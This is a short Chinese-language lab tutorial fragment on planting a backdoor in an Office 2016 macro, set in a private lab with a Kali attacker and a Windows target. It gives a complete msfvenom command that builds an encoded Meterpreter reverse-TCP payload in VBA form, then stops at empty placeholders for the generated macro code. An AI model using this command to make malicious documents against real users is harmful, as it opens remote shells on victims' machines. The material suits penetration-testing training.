实验环境:
kali攻击机(192.168.98.30)
window目标机(192.168.98.35)
office 2016
实验步骤:
1、生成后门
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.98.30 LPORT=5555 -e x86/shikata_ga_nai -i 10 -f vba-exe
执行完成后会生成 2 段代码
第一段代码是 MACRO CODE 宏代码
从这里开始:
到这里结束: